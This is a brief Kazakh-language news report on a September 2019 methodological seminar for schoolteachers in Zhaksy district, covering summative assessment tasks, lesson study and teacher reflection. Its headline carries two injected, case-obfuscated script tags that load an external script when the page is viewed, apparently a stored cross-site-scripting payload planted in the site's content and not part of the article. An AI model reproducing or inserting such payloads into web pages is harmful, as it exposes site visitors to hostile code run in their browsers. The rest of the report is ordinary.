Жетекші мектептер базасында әдістемелік күндер аясында өткізілген семинар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
16.09.2019
2019 жылдың 12 қыркүйегінде Жақсы ауданында Жетекші мектептер базасында әдістемелік күндер аясында «Жиынтық бағалау өткізу тәсілдері: тапсырма түрлері» , «Мектептегі сабақты зерттеуді ұйымдастыру», «Мұғалім тәжірбиесіндегі рефлексия» атты тақырыбында тренинг семинары болып өтті. Семинар мақсаты: Білім беру мазмұнын жаңарту шеңберінде жалпы білім беретін мектептердің мұғалімдеріне әдістемелік көмек көрсету.
Семинарды ЦПМ тренерлері өткізді, қатысушылармен кері байланыс, рефлексия, негізгі мәселелер бойынша сұрақтары талқылап, БЖБ және ТЖБ жасау жолдары бойынша практикалық кеңестер берілді.
Қатысушылар оқыту семинарының ұйымдастыру және өткізу іс-шараларына жоғары баға беріп, олардың оқыту және оқушылардың жетістіктерін бағалауда үлестірме әдістемелік материалды одан әрі жетілдіру үшін педагогикалық шеберліктің практикалық бағыттылығы, қажеттілігі мен құндылығын атап өтті.
Оразалы Т.Ж.